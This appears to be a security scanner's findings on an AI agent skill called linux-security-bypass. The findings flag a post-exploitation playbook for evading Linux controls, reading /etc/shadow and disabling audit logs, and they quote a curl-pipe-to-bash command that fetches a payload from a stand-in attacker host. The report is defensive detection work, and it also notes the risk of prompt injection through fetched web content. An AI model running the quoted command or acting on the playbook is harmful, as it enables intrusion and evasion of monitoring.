linux-security-bypass

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This is an explicit post‑exploitation playbook providing step‑by‑step methods to evade Linux security controls, execute arbitrary and fileless payloads (including remote curl|bash), access sensitive files (e.g., /etc/shadow), and tamper with or disable audit/logging—clear instructions for malicious compromise and backdoor persistence/evasion.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs fetching and executing remote web content (e.g., "curl -sL https://attacker.com/payload | bash ddexec.sh" in the DDexec section), which clearly ingests untrusted third-party web content that could change runtime actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill contains a runtime command that fetches and executes remote code—"curl -sL https://attacker.com/payload | bash ddexec.sh"—so https://attacker.com/payload is a required external dependency that would execute code when run.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt is an explicit post-exploitation playbook that instructs bypassing restricted shells, executing binaries on noexec mounts, using fileless execution, tampering logs, disabling auditing, and other actions that modify system state and enable unauthorized control.